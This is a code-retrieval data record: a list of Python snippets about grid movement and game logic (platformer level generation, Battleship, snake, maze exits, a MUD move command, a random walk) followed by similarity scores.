is 0) \\\n or (y is self.blocks_per_room_y - 1 and x > 0 and pos < 20 and rooms[pos][y][x - 1] is 0):\n block = Platform(self.block_width, self.block_height, 'top left', self.theme)\n #check conditionals to see if we are using the sprite with the rounded corner in the top right\n elif ((y + 1) < self.blocks_per_room_y and (x - 1) >= 0 and (x + 1) < self.blocks_per_room_x\n and rooms[pos][y + 1][x] is 1 and rooms[pos][y][x + 1] is 0 and rooms[pos][y][x - 1] is 1)\\\n or (x is self.blocks_per_room_x - 1 and y < self.blocks_per_room_y - 1 and pos < 24 and rooms[pos][y + 1][x] is 0 and rooms[pos + 1][y][0] is 0)\\\n or (y is self.blocks_per_room_y - 1 and x < self.blocks_per_room_x - 1 and pos < 20 and rooms[pos][y][x + 1] is 0):\n block = Platform(self.block_width, self.block_height, 'top right', self.theme)\n else:\n block = Platform(self.block_width, self.block_height, 'top', self.theme)\n else:\n block = Platform(self.block_width, self.block_height, 'middle', self.theme)\n coord_x = self.block_width + (pos % 5) * self.room_side_length_x + x * self.block_width\n block.rect.x = coord_x\n block.rect.y = self.block_height + (pos // 5) * self.room_side_length_y + y * self.block_height\n block.player = self.player\n self.platform_list.add(block)\n #if the space above this block is empty see if we spawn an enemy on the spot above current block\n if rooms[pos][y-1][x] is 0 and y - 1 >= 0:\n self.enemy_generation(coord_x, self.block_height + (pos // 5) * self.room_side_length_y + (y - 1) * self.block_height)\n # if the cell is a 3 then it will be an item pickup\n elif rooms[pos][y][x] is 3:\n rand = random.randrange(0, 4)\n if rand == 0:\n #calculate coordinates of the bag\n bag = pickupSprite('rope')\n # print('width = ' + str(self.block_width) + ' height = ' + str(self.block_height))\n bag.rect.x = self.block_width + (pos % 5) * self.room_side_length_x + x * self.block_width\n bag.rect.y = self.block_height + (pos // 5) * self.room_side_length_y + y * self.block_height\n bag.player = self.player\n self.bagGroup.add(bag)\n elif rand == 1:\n #calculate coordinates of the bag\n bag = pickupSprite('knife')\n # print('width = ' + str(self.block_width) + ' height = ' + str(self.block_height))\n bag.rect.x = self.block_width + (pos % 5) * self.room_side_length_x + x * self.block_width\n bag.rect.y = self.block_height + (pos // 5) * self.room_side_length_y + y * self.block_height\n bag.player = self.player\n self.bagGroup.add(bag)\n elif rand == 2:\n bag = pickupSprite('health')\n bag.rect.x = self.block_width + (pos % 5) * self.room_side_length_x + x * self.block_width\n bag.rect.y = self.block_height + (pos // 5) * self.room_side_length_y + y * self.block_height\n bag.player = self.player\n self.bagGroup.add(bag)\n\n\n # if the cell is a 4 then it will be either a spike, if the space is on the bottom of the room,\n # otherwise it is a randomized block or nothing\n elif rooms[pos][y][x] is 4:\n # if the cell is at the bottom of the level, randomly choose whether to place a spike or not\n rand = random.randrange(0, 3)\n rand2 = random.randrange(0, 2)\n if y is 6 and rand is 1:\n spike = enemies.Spikes()\n spike.rect.x = self.block_width + (pos % 5) * self.room_side_length_x + x * self.block_width\n spike.rect.y = self.block_height + (pos // 5) * self.room_side_length_y + y * self.block_height\n spike.player = self.player\n self.enemy_list.add(spike)\n # elif y is 6 and rand is 2:\n # dart = enemies.Darts(self.theme, 'up')\n # dart.rect.x = self.block_width + (pos % 5) * self.room_side_length_x + x * 
self.block_width\n # dart.rect.y = self.block_height + (pos // 5) * self.room_side_length_y + y * self.block_height\n # dart.player = self.player\n # self.enemy_list.add(dart)\n elif y != 6 and rand2 is 0:\n if rooms[pos][y - 1][x] is 0:\n block = Platform(self.block_width, self.block_height, 'top', self.theme)\n else:\n block = Platform(self.block_width, self.block_height, 'middle', self.theme)\n block.rect.x = self.block_width + (pos % 5) * self.room_side_length_x + x * self.block_width\n block.rect.y = self.block_height + (pos // 5) * self.room_side_length_y + y * self.block_height\n block.player = self.player\n self.platform_list.add(block)\n elif y != 6 and rand2 is 1:\n if x-1 >= 0 and x+1 <= self.blocks_per_room_x and y-1 >= 0 and y+1 < self.blocks_per_room_y:\n if rooms[pos][y][x-1] is 0:\n direction = 'left'\n blockType = 'middle'\n elif rooms[pos][y][x+1] is 0:\n direction = 'right'\n blockType = 'middle'\n elif rooms[pos][y-1][x] is 0:\n direction = 'up'\n blockType = 'top'\n elif rooms[pos][y+1][x] is 0:\n direction = 'down'\n blockType = 'middle'\n else:\n direction = None\n if direction is not None:\n # use for both block and dart\n rectX = self.block_width + (pos % 5) * self.room_side_length_x + x * self.block_width\n rectY = self.block_height + (pos // 5) * self.room_side_length_y + y * self.block_height\n\n block = Platform(self.block_width, self.block_height, blockType, self.theme)\n block.rect.x = rectX\n block.rect.y = rectY\n block.player = self.player\n self.platform_list.add(block)\n\n dart = enemies.Darts(self.theme, direction)\n dart.rect.x = rectX\n dart.rect.y = rectY\n dart.player = self.player\n self.enemy_list.add(dart)\n # this is the starting and ending points of the level\n elif rooms[pos][y][x] is 7:\n # exit of the game on the top row of the level\n if pos // 5 is 0:\n #calculate coordinates of the exit\n self.exit_coords['x'] = self.block_width + (pos % 5) * self.room_side_length_x + x * self.block_width\n self.exit_coords['y'] = self.block_height + (pos // 5) * self.room_side_length_y + y * self.block_height\n exit = exit_door_sprite(self.block_width, self.block_height)\n # print('width = ' + str(self.block_width) + ' height = ' + str(self.block_height))\n exit.rect.x = self.exit_coords['x']\n exit.rect.y = self.exit_coords['y']\n exit.player = self.player\n self.exit_sprite.add(exit)\n #entance of the game on the bottom row of the level\n elif pos // 5 is 4:\n #calculate coordinates of the entrance\n self.entrance_coords['x'] = self.block_width + (pos % 5) * self.room_side_length_x + x * self.block_width\n self.entrance_coords['y'] = self.block_height + (pos // 5) * self.room_side_length_y + y * self.block_height", "def change_cell(self):\n\n x, mu = self.update_position_direction(self.l_edge)\n mu_mean = self.calculate_mean_mu(self.x, x, self.l_edge)\n self.update_estimators(self.l_edge, mu_mean)\n\n if self.next_cell_index == self.grid.Ncells:\n # packet escapes\n self.is_escaped = True\n self.is_active = False\n self.mu = mu\n self.x = self.cell_xr\n\n elif self.next_cell_index == -1:\n\n raise GeometryException(\"No inner boundary in homogeneous sphere\")\n\n else:\n # packet is transported into target cell\n\n self.mu = mu\n\n if self.next_cell_index > self.cell_index:\n # packet is moved one cell to the right\n\n self.x = self.grid.xl[self.next_cell_index]\n\n else:\n # packet is moved one cell to the left\n\n self.x = self.grid.xr[self.next_cell_index]\n\n # reset cell-based properties for easy access\n self.cell_index = self.next_cell_index\n 
self.cell_chi = self.grid.chi[self.cell_index]\n self.cell_xl = self.grid.xl[self.cell_index]\n self.cell_xr = self.grid.xr[self.cell_index]\n self.cell_dx = self.grid.dx[self.cell_index]\n self.cell_dV = self.grid.dV[self.cell_index]\n\n # recalculate distances\n self.calculate_and_set_propagation_distances()", "def make_move(self, direction):\r\n\t\tif direction == 0:\r\n\t\t\tself.board[self.x][self.y], self.board[self.x-1][self.y] = self.board[self.x-1][self.y], self.board[self.x][self.y]\r\n\t\t\tself.x -= 1\r\n\r\n\t\telif direction == 1:\r\n\t\t\tself.board[self.x][self.y], self.board[self.x][self.y+1] = self.board[self.x][self.y+1], self.board[self.x][self.y]\r\n\t\t\tself.y += 1\r\n\r\n\t\telif direction == 2:\r\n\t\t\tself.board[self.x][self.y], self.board[self.x+1][self.y] = self.board[self.x+1][self.y], self.board[self.x][self.y]\r\n\t\t\tself.x += 1\r\n\r\n\t\telif direction == 3:\r\n\t\t\tself.board[self.x][self.y], self.board[self.x][self.y-1] = self.board[self.x][self.y-1], self.board[self.x][self.y]\r\n\t\t\tself.y -= 1", "def spawn(self):\r\n self.direction = utils.RANDOM.random()*math.pi*2 - math.pi\r\n self.redraw_image()\r\n self.speed = 0\r\n self.ammo = self.world.level.DEFAULT_AMMO\r\n self.alive = True\r\n self.kills = 0\r\n \r\n # Find a spawn point.\r\n # This loop might in theory take forever to return. In practice,\r\n # it returns within a reasonable number of iterations\r\n\r\n self.rect.center = self.team.get_spawn_point()\r\n while self.world.is_colliding(self):\r\n self.rect.centerx += utils.RANDOM.choice((-10, 10))\r\n self.rect.centery += utils.RANDOM.choice((-10, 10))\r\n self.rect.clamp_ip(self.world.rect) #never search outside the world\r\n \r\n #location keeps a floating point representation of the center of the\r\n #agent, mirroring the self.rect.center with higher precision.\r\n self.location = self.rect.center\r\n\r\n self.team.stats[\"spawns\"] += 1", "def aggrandir_serpent():\n\n (i,j)=coordonnees_serpent[0]\n \n if direction==0 :\n pass\n\n elif direction == \"haut\" :\n serpent.insert(0,\n TERRAIN.create_rectangle(i* coté, j * coté, i * coté+ coté, j * coté + coté, fill = \"green\", outline = 'green'))\n coordonnees_serpent.insert(0,(i,j-1))\n\n elif direction == \"bas\" :\n serpent.insert(0,\n TERRAIN.create_rectangle(i* coté, j * coté, i * coté+ coté, j * coté + coté, fill = \"green\", outline = 'green'))\n coordonnees_serpent.insert(0,(i,j+1))\n\n elif direction == \"droite\" :\n serpent.insert(0,\n TERRAIN.create_rectangle(i* coté, j * coté, i * coté+ coté, j * coté + coté, fill = \"green\", outline = 'green'))\n coordonnees_serpent.insert(0,(i+1,j))\n\n elif direction == \"gauche\" :\n serpent.insert(0,\n TERRAIN.create_rectangle(i* coté, j * coté, i * coté+ coté, j * coté + coté, fill = \"green\", outline = 'green'))\n coordonnees_serpent.insert(0,(i-1,j))", "def _place(player, size, length, number):\n\n if number == 0:\n return\n name = player.name\n ship = player.board.fleet.name_ship(length)\n print \"\\n%s, please place your %s. 
(Length: %s)\\n\" % (name, ship, length)\n\n player.board.display(True)\n\n coord = man_coord(size)\n x = coord[0]\n y = coord[1]\n direct = man_dir()\n\n if player.board.check(x, y, length, direct) is True:\n name = player.fleet.name_ship(length)\n player.fleet.add_ship(name, x, y, length, direct)\n return _place(player, size, length, number - 1)\n print \"\\nSorry, that ship won't fit, please try again.\"\n return _place(player, size, length, number)", "def saveRoboPath(self):\r\n if time.time()-self.timeold > 2: \r\n self.RoboPath.append([round(self.RoboPosX,1),round(self.RoboPosY,1)])\r\n self.timeold = time.time()", "def create_grid(player1: game_code.Player, player2: game_code.Player) -> None:\r\n status = True\r\n abort = False\r\n\r\n # Initialize two game board both with randomized ship placements\r\n player_1 = game_code.RandomizedBattleshipGame()\r\n player_2 = game_code.RandomizedBattleshipGame()\r\n\r\n player_1_sequence = []\r\n player_2_sequence = []\r\n player_1_previous_move = None\r\n player_2_previous_move = None\r\n\r\n save_initial_state1 = player_1\r\n save_initial_state2 = player_2\r\n\r\n escape = instruction_font.render('HIT ESC TO RETURN TO THE MAIN MENU OR TO START A NEW GAME', False,\r\n (255, 255, 255))\r\n player_label_1 = label_font.render('Player 1', False, (255, 255, 255))\r\n player_label_2 = label_font.render('Player 2', False, (255, 255, 255))\r\n\r\n while status:\r\n screen.blit(background, (0, 0))\r\n\r\n # Draw the grids belonging to each player\r\n for column in range(0, 8):\r\n for row in range(0, 8):\r\n cell = pygame.Rect((190 + column * 50, 160 + row * 50), (50, 50))\r\n pygame.draw.rect(screen, (255, 255, 255, 1), cell, 0)\r\n pygame.draw.rect(screen, (0, 0, 0, 1), cell, 3)\r\n\r\n for column in range(0, 8):\r\n for row in range(0, 8):\r\n cell = pygame.Rect((690 + column * 50, 160 + row * 50), (50, 50))\r\n pygame.draw.rect(screen, (255, 255, 255, 1), cell, 0)\r\n pygame.draw.rect(screen, (0, 0, 0, 1), cell, 3)\r\n\r\n # Display labels and text\r\n screen.blit(player_label_1, (340, 580))\r\n screen.blit(player_label_2, (840, 580))\r\n screen.blit(escape, (25, 685))\r\n\r\n columns = 'ABCDEFGH'\r\n rows = '12345678'\r\n # Label Player 1 Board\r\n for letter in range(0, 8):\r\n label = label_font.render(columns[letter], False, (255, 255, 255))\r\n screen.blit(label, (205 + letter * 50, 125))\r\n for number in range(0, 8):\r\n label = label_font.render(rows[number], False, (255, 255, 255))\r\n screen.blit(label, (165, 170 + number * 50))\r\n # Label Player 2 Board\r\n for letter in range(0, 8):\r\n label = label_font.render(columns[letter], False, (255, 255, 255))\r\n screen.blit(label, (705 + letter * 50, 125))\r\n for number in range(0, 8):\r\n label = label_font.render(rows[number], False, (255, 255, 255))\r\n screen.blit(label, (665, 170 + number * 50))\r\n\r\n # Display the ships prior to starting the game\r\n display_ships(save_initial_state1, True)\r\n display_ships(save_initial_state2, False)\r\n\r\n if player_1_previous_move is None and player_2_previous_move is None:\r\n pygame.display.update()\r\n pygame.time.wait(1000)\r\n\r\n while player_1.get_winner() is None and player_2.get_winner() is None and not abort:\r\n\r\n # player1 shot on player2 Board\r\n player_1_previous_move = player1.make_move(player_2, player_1_previous_move)\r\n player_2.make_move(player_1_previous_move)\r\n player_1_sequence.append(player_1_previous_move)\r\n if player_2.get_winner() is not None:\r\n break\r\n # player1 on player2 Board\r\n player_2_previous_move 
= player2.make_move(player_1, player_2_previous_move)\r\n player_1.make_move(player_2_previous_move)\r\n player_2_sequence.append(player_2_previous_move)\r\n\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_ESCAPE:\r\n abort = True\r\n status = False\r\n\r\n display_ships(player_1, True)\r\n pygame.time.wait(500)\r\n pygame.display.update()\r\n pygame.time.wait(500)\r\n display_ships(player_2, False)\r\n pygame.display.update()\r\n\r\n # Display the victory message of the winning player\r\n if player_1.get_winner() == 'Lost':\r\n winner = 'Player 2'\r\n victory = message_font.render(winner + ' Wins!', False, (255, 255, 255))\r\n screen.blit(victory, (450, 50))\r\n else:\r\n winner = 'Player 1'\r\n victory = message_font.render(winner + ' Wins!', False, (255, 255, 255))\r\n screen.blit(victory, (450, 50))\r\n\r\n # Display the final state of the game\r\n display_ships(player_1, True)\r\n display_ships(player_2, False)\r\n\r\n # Check for user input\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_ESCAPE:\r\n status = False\r\n\r\n pygame.display.update()", "def WallsPosition():\n\tcnt=40\n\twhile cnt>0:\n\t\ta=random.randint(0,15)\n\t\tb=random.randint(0,35)\n\t\tif(board[a][b]=='.'):\n\t\t\tboard[a][b]='X'\n\t\t\tcnt=cnt-1", "def addRover(self, rover):\n self.roverList.append(rover)", "def move(self, direction):\n newx = self.x\n newy = self.y\n newy += random.randint(-1, 1)\n newx += random.randint(-1, 1)\n if self.tmap.contents[newy][newx] != '#':\n self.x = newx\n self.y = newy", "def move(player, direction):\r\n \r\n curRoom = world.maps.World.mapGrid[player.room]\r\n door = curRoom.dirs[direction]\r\n roomid = world.maps.World.doors[door].getExitRoom(curRoom.id)\r\n newRoom = world.maps.World.mapGrid[roomid]\r\n brokesneak = False\r\n \r\n if player.getAttr(SNEAKING) and not utils.gameutils.stealthRoll(player):\r\n player.setAttr(SNEAKING, False)\r\n sendToRoomNotPlayer(player, \"{0}You notice {1} sneaking out to the {2}.\".format(LRED, player, DIRS[direction])) \r\n sendToPlayer(player, \"{0}You make a sound\".format(LRED))\r\n brokesneak = True\r\n elif not player.getAttr(SNEAKING): \r\n sendToRoomNotPlayer( player, \"{0} left to the {1}.\".format(player, DIRS[direction])) \r\n \r\n del curRoom.players[player.name]\r\n newRoom.players[player.name] = player\r\n player.room = newRoom.id\r\n\r\n if brokesneak:\r\n sendToRoomNotPlayer(player, \"{0}You notice {1} sneaking into the room from the {2}.\".format(LRED, player, DIRS[OPPOSITEDIRS[direction]])) \r\n elif not player.getAttr(SNEAKING):\r\n sendToRoomNotPlayer(player, \"{0} entered from the {1}.\".format(player, DIRS[OPPOSITEDIRS[direction]])) \r\n \r\n displayRoom(player, player.room)\r\n player.stats[MOVING] = False", "def move(self):\n \n self.rect.move_ip(0,self.speed) # Funcion para mover el enemigo especificando la velocidad xy\n \n if (self.rect.top > SCREEN_HEIGHT): # Condicion cuando llega a la parte inferior y no colisiono con el jugador\n del self.surf #Libera memoria\n del self.rect\n self.randomNumber = random.choice([70,64,32]) # Su tamaño se asigna nuevamente\n self.size = (self.randomNumber,self.randomNumber) #Se genera su tamaño como un cuadrado de lado aleatorio\n self.surf = pygame.Surface(self.size) #Se genera la superficie que aparecera la pantalla\n self.surf.fill(RED)\n 
self.rect = self.surf.get_rect(center = (random.randint(40,SCREEN_WIDTH-40),0))# me da info de las coordenadas de surf\n if(self.randomNumber == 32):\n self.surf = self.imagen\n elif(self.randomNumber ==64):\n self.surf = self.imagen2\n elif self.randomNumber ==70 :\n self.surf = self.imagen3", "def make_move(self, tower):\r\n height, index = self.__find_random_moves(tower)\r\n \r\n if self.stat_brain.all_valid(tower) == 0 or self.stat_brain.is_valid(height, index, tower):\r\n return height, index\r\n else:\r\n while not self.stat_brain.is_valid(height, index, tower):\r\n height, index = self.__find_random_moves(tower)\r\n \r\n return height, index", "def fill_walk(self):\n\n #Seguir tomando caminos hasta que se alcance la cantidad establecida.\n while len(self.x_values) < self.num_points:\n\n #Decidir cual direccion tomar y cuan lejos ir hacia esa direccion.\n x_direction = choice([1, -1])\n x_distance = choice([0, 1, 2, 3, 4])\n x_step = x_direction * x_distance\n\n y_direction = choice([1,-1])\n y_distance = choice([0, 1, 2, 3, 4])\n y_step = y_direction * y_distance\n\n #Ignorar movimientos nulos.\n if x_step == 0 and y_step == 0:\n continue\n\n #Calcular la nueva posicion.\n x = self.x_values[-1] + x_step\n y = self.y_values[-1] + y_step\n\n self.x_values.append(x)\n self.y_values.append(y)", "def move(self, new_home):\n #checked#\n ###your code here###\n if self.home!=None:\n self.home.occupant=None\n new_home.occupant=self\n self.home=new_home", "def place_exit(self):\r\n x = random.randint(0, (self.__nx - 1))\r\n y = random.randint(0, (self.__ny - 1))\r\n self.__exit_room = x, y\r\n if self.exit_room() == self.pillar_a_room() or \\\r\n self.exit_room() == self.pillar_e_room() or \\\r\n self.exit_room() == self.pillar_i_room() or \\\r\n self.exit_room() == self.pillar_p_room() or \\\r\n self.exit_room() == self.entrance_room():\r\n return self.place_exit()\r\n self.__maze[x][y].set_exit(True)" ]
[ "0.62105554", "0.620282", "0.59880394", "0.5978847", "0.5967129", "0.5945851", "0.5943394", "0.59243786", "0.5899155", "0.5898589", "0.5803447", "0.5776576", "0.5759452", "0.5755554", "0.5738934", "0.57336867", "0.5733618", "0.5726307", "0.57162607", "0.5699025", "0.5692675", "0.5677311", "0.56651026", "0.56284827", "0.56274664", "0.56126356", "0.56100196", "0.56078", "0.56078", "0.55932343", "0.5590871", "0.558711", "0.55827636", "0.55826247", "0.55692273", "0.5566758", "0.55522287", "0.5550628", "0.55393565", "0.5533918", "0.5530434", "0.5527034", "0.55216223", "0.54955065", "0.5495043", "0.5485583", "0.5481483", "0.54745597", "0.54741764", "0.547389", "0.5471458", "0.5451194", "0.5444977", "0.54446965", "0.54407126", "0.5429447", "0.54290426", "0.5426966", "0.5426145", "0.5401077", "0.5398895", "0.53961456", "0.5393413", "0.53925043", "0.5388645", "0.5387758", "0.538195", "0.53798413", "0.5377749", "0.5376276", "0.5367685", "0.5364699", "0.5361238", "0.535794", "0.5350529", "0.5346746", "0.5345112", "0.53420347", "0.5339941", "0.5339807", "0.5334795", "0.5333292", "0.5332544", "0.5332472", "0.5330408", "0.5329506", "0.5326436", "0.53182966", "0.53178245", "0.53170055", "0.5310794", "0.531005", "0.530804", "0.53076583", "0.5306072", "0.53044444", "0.5304288", "0.53033036", "0.530189", "0.53007513" ]
0.68636113
0
Tries to navigate and reposition the rover on the grid. Throws an exception if: it cannot find that rover on the grid; a bad instruction is passed; or executing the instruction string would cause a collision with another rover on the grid.
def navigate_rover(self, name, instruction_str): rover = self.rovers.get(name) if not rover: raise RoverException(ExceptionMessages.BAD_NAME) coordinate = copy.deepcopy(rover.coordinate) direction = rover.direction for instruction in instruction_str: if instruction == 'L' or instruction == 'R': direction = self._direction_after_turning(direction, instruction) elif instruction == 'M': coordinate = self._coordinate_after_moving(direction, coordinate) else: raise RoverException(ExceptionMessages.INVALID_INSTRUCTION) # This means we have processed all the instructions without exception # assign new direction and coordinates to rover rover.direction = direction rover.coordinate = coordinate
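Note on the positive document above: `navigate_rover` relies on two helpers, `_direction_after_turning` and `_coordinate_after_moving`, that the snippet itself does not define. The sketch below is one plausible, minimal implementation, assuming a four-point compass ('N', 'E', 'S', 'W'), unit-length 'M' moves, and a coordinate object with `x`/`y` fields; the helper names come from the document, but these bodies are illustrative assumptions, not the dataset's actual code.

from dataclasses import dataclass

_COMPASS = ['N', 'E', 'S', 'W']  # clockwise order, so index arithmetic gives turns

@dataclass
class Coordinate:
    x: int
    y: int

def _direction_after_turning(direction, instruction):
    # 'L' steps counter-clockwise through the compass, 'R' steps clockwise.
    step = -1 if instruction == 'L' else 1
    return _COMPASS[(_COMPASS.index(direction) + step) % len(_COMPASS)]

def _coordinate_after_moving(direction, coordinate):
    # Advance one grid unit along the current heading (assuming 'N' increases y).
    dx, dy = {'N': (0, 1), 'E': (1, 0), 'S': (0, -1), 'W': (-1, 0)}[direction]
    return Coordinate(coordinate.x + dx, coordinate.y + dy)

# Worked example under these assumptions: a rover at (1, 2) facing 'N' given the
# instruction string 'LM' turns to 'W' and ends at (0, 2).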
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def process_rover(grid, start_at, instructions, name='rover'):\n plateu = None\n try:\n if isinstance(grid, str):\n x_end, y_end = grid.split(' ')\n x_end = int(x_end)\n y_end = int(y_end)\n plateu = Plateu(x_end, y_end, name)\n\n elif isinstance(grid, Plateu):\n plateu = grid\n\n else:\n raise ValueError(\"'grid' must be of type str or Plateu.\")\n\n except Exception as e:\n # Error handling code here for plateu here.\n print(e.message)\n return e # Should be re-raises and handled by API, CLI, etc.\n\n try:\n x, y, f = start_at.split(' ')\n x = int(x)\n y = int(y)\n rover = Rover(x, y, f, plateu, name)\n for i in range(len(instructions)):\n rover.position_rover(instructions[i])\n # Leaving this in comments for later debugging.\n # print(instructions[i] +\n # repr(rover.position_rover(instructions[i])))\n\n except Exception as e:\n # Error handling code here for rover here.\n print(e.message)\n return e # Should be re-raises and handled by API, CLI, etc.\n\n print(rover.get_position())\n return rover", "def test_7_replay_4(self):\n self._execute_replay_nr(4)\n\n self.grid.add_pawn(5, 'H')\n self.grid.add_pawn(3, 'B')\n self.grid.add_pawn(2, 'H')\n self.grid.add_pawn(1, 'B')\n self.grid.add_pawn(1, 'H')\n\n # self.grid.print_grid()\n # print(self.minmaxBot_7.choose_move(self.grid))", "def move(self):\n # neighbor offsets\n offset = [(-1, 1),(0, 1),(1, 1),(-1, 0),(1, 0),(-1, -1),(0, -1),(1, -1)]\n for i in range(len(offset)):\n x = self.x + offset[i][0] # neighboring coordinates\n y = self.y + offset[i][1]\n if self.island.animal(x, y) == 0: # neighboring spot is open\n self.island.remove(self) # remove from current spot\n self.x = x # new coordinates\n self.y = y\n self.island.register(self) # register new coordinates\n break # finished with move", "def move(self):\n # neighbor offsets\n offset = [(-1, 1),(0, 1),(1, 1),(-1, 0),(1, 0),(-1, -1),(0, -1),(1, -1)]\n for i in range(len(offset)):\n x = self.x + offset[i][0] # neighboring coordinates\n y = self.y + offset[i][1]\n if self.island.animal(x, y) == 0: # neighboring spot is open\n self.island.remove(self) # remove from current spot\n self.x = x # new coordinates\n self.y = y\n self.island.register(self) # register new coordinates\n break # finished with move", "def move_right():\n return __maze.move_right()", "def test_rover_position(self):\n rover = Rover(self.plateau_dimensions, self.rover_initial_position, Rover.DIRECTIONS.get('E'))\n rover.execute_instructions(\"LMLM\")\n self.assertEqual(rover._position.x, 1)\n self.assertEqual(rover._position.y, 2)\n self.assertEqual(rover.get_heading, 'W')", "def nextmove(x,y,xr,yr,count,xsgn=1,ysgn=1,redo=False,redo_fail=False,back=False,\n noback=False,backret=True,wander=True,silent=False):\n\n global BTRACK, GSTRUC, NPIX\n\n endflag = False\n \n\n # This is the very end \n if (x==xr[1] and y==yr[1]):\n endflag = True\n return None,None,None,None,None,False,False,endflag\n \n\n # If back, redo and BACKRET=1 then return to pre-redo position\n #=============================================================\n # This is done separately from the normal algorithm \n if backret and back and redo: \n back = False\n lastcount = BTRACK['count']\n newx = BTRACK['data'][-1]['lastx']\n newy = BTRACK['data'][-1]['lasty']\n lastx = BTRACK['data'][-1]['x']\n lasty = BTRACK['data'][-1]['y']\n par0 = BTRACK['data'][-1]['par'] # parameters from the current position\n\n # p0 is the redo position, p5 is the pre-redo position \n p0,res0 = gfind(lastx,lasty,xr=xr,yr=yr)\n p5,res5 = gfind(newx,newy,xr=xr,yr=yr)\n\n 
b,dbic = gbetter(res0,res5)\n redo = gredo(newx,newy,lastx,lasty,par0) \n\n # back position better, redo pre-redo position \n if (dbic<0) and redo: \n # Getting the guess\n guesspar,guessx,guessy = gguess(x,y,xr,yr,xsgn,ysgn)\n redo = True\n skip = False\n # back position worse, or can't redo pre-position, skip \n else:\n redo = False\n skip = True\n guesspar,guessx,guessy = None,None,None\n \n return newx,newy,guessx,guessy,guesspar,back,redo,skip,endflag\n\n\n # Redo Failed! Return to original position\n # If we went back and backret=1 then return to pre-redo position\n # if we went forward then don't do anything, should continue forward \n if redo and redo_fail and back: \n # Go back to pre-redo position and skip\n newx = BTRACK[-1]['data']['lastx']\n newy = BTRACK[-1]['data']['lasty']\n skip = True\n return newx,newy,None,None,None,False,False,skip,endflag\n \n\n # Some default values\n skip = False\n newx,newy = None,None\n guesspar,guessx,guessy = None,None,None\n\n \n # Positions\n #\n # ^ Y P2 \n # | P3 P0 P1\n # | P4\n # --------> X\n \n # Get the positions, THIS IS THE PROPER WAY TO DO IT!!!!! \n x1,y1 = gincrement(x,y,xr,yr,xsgn=xsgn,ysgn=ysgn)\n x2,y2 = gincrement(x,y,xr,yr,xsgn=xsgn,ysgn=ysgn,p2=True) \n x3,y3 = gincrement(x,y,xr,yr,xsgn=-xsgn,ysgn=-ysgn)\n x4,y4 = gincrement(x,y,xr,yr,xsgn=xsgn,ysgn=-ysgn,p2=True)\n\n # Have they been visited before?\n # ps are 0 or 1\n p0,res0 = gfind(x,y,xr=xr,yr=yr)\n par0 = res0['par']\n p1,res1 = gfind(x1,y1,xr=xr,yr=yr)\n p2,res2 = gfind(x2,y2,xr=xr,yr=yr)\n p3,res3 = gfind(x3,y3,xr=xr,yr=yr)\n p4,res4 = gfind(x4,y4,xr=xr,yr=yr)\n\n # Comparing the solutions at neighboring positions\n # bs are 0, 1 or -1\n b1,dbic1 = gbetter(res0,res1)\n res1['better'] = b1\n res1['dbic'] = dbic1\n b2,dbic2 = gbetter(res0,res2)\n res2['better'] = b2\n res2['dbic'] = dbic2\n b3,dbic3 = gbetter(res0,res3)\n res3['better'] = b3\n res3['dbic'] = dbic3\n b4,dbic4 = gbetter(res0,res4)\n res4['better'] = b4\n res4['dbic'] = dbic4 \n \n # Do we need to redo?\n red1,red2,red3,red4 = False,False,False,False\n if (p1==1) and (b1==0): \n red1 = True\n if (p2==1) and (b2==0): \n red2 = True\n if (p3==1) and (b3==0): \n red3 = True\n if (p4==1) and (b4==0): \n red4 = True\n\n xx = [x1,x2,x3,x4]\n yy = [y1,y2,y3,y4]\n pp = [p1,p2,p3,p4]\n bb = [b1,b2,b3,b4]\n rr = [red1,red2,red3,red4]\n \n # Printing out the info\n if silent==False:\n if count>0:\n print(' ')\n print('Count = %d' % count)\n print('Last/Current Position = (%d,%d)' %(x,y))\n print('Neighbors (position) visited better redo')\n for i in range(4):\n if xx[i] is not None:\n strx = '%5d' % xx[i]\n else:\n strx = '-----'\n if yy[i] is not None:\n stry = '%5d' % yy[i]\n else:\n stry = '-----' \n print('P%1d (%5s,%5s) %7d %7d %7s' % (i+1,strx,stry,pp[i],bb[i],str(rr[i]))) \n print('')\n\n \n # If P3 or P4 worse than P0 then move back to worst decomp \n # If P3 and P4 better than P0 then move forward,\n # -if both have been visited before then do the worst decomp \n # -if neither has been visited before then move to P1. 
\n\n \n\n # Starting Normal Algorithm\n # (not redo+back+backred)\n #==========================\n\n # More generic algorithm, checks all 4 positions and possible redos\n newscheme = True\n if noback==False and newscheme:\n endflag = False\n res1['redo'] = False\n if res1['visited']==True:\n res1['redo'] = gredo(res1['x'],res1['y'],x,y,par0)\n res2['redo'] = False\n if res2['visited']==True:\n res2['redo'] = gredo(res2['x'],res2['y'],x,y,par0) \n res3['redo'] = False\n if res3['visited']==True:\n res3['redo'] = gredo(res3['x'],res3['y'],x,y,par0) \n res4['redo'] = False\n if res4['visited']==True:\n res4['redo'] = gredo(res4['x'],res4['y'],x,y,par0)\n res = [res1,res2,res3,res4]\n redos = [res1['redo'],res2['redo'],res3['redo'],res4['redo']]\n dbic = np.array([res1['dbic'],res2['dbic'],res3['dbic'],res4['dbic']])\n toredo, = np.where((np.array(redos)==True) & (dbic<0))\n # Some redos\n if len(toredo)>0:\n # Find the one with the worst solution\n if len(toredo)>1:\n best1 = np.argmin(dbic[toredo])\n best = toredo[best1]\n else:\n best = toredo[0]\n if best>=2:\n back = True\n else:\n back = False\n newres = res[best]\n newx,newy = newres['x'],newres['y']\n guessx,guessy,guesspar = x,y,par0\n redo = True\n # No redos, more foward to P1\n else:\n redo = False\n back = False\n newx,newy = x1,y1\n guessx,guessy,guesspar = x,y,par0\n # if we already visited P1, then skip\n if res1['visited']:\n skip = True\n else:\n skip = False\n \n return newx,newy,guessx,guessy,guesspar,back,redo,skip,endflag\n \n # check if the position is a \"valid\" one\n # check if it was previously visited\n # check if it CAN be redone\n # for all that can be redone, which one has the largest negative dbic (worse solution)\n \n \n\n #============================== \n #---- CHECKING BACKWARDS ----\n #============================== \n if ((p3==1) or (p4==1)) and (noback==False): \n\n # Only P3 visited before\n #=======================\n if (p3==1) and (p4==0): \n # Can this position be redone\n redo = gredo(x3,y3,x,y,par0)\n # P3 worse than P0, moving back\n #------------------------------\n if 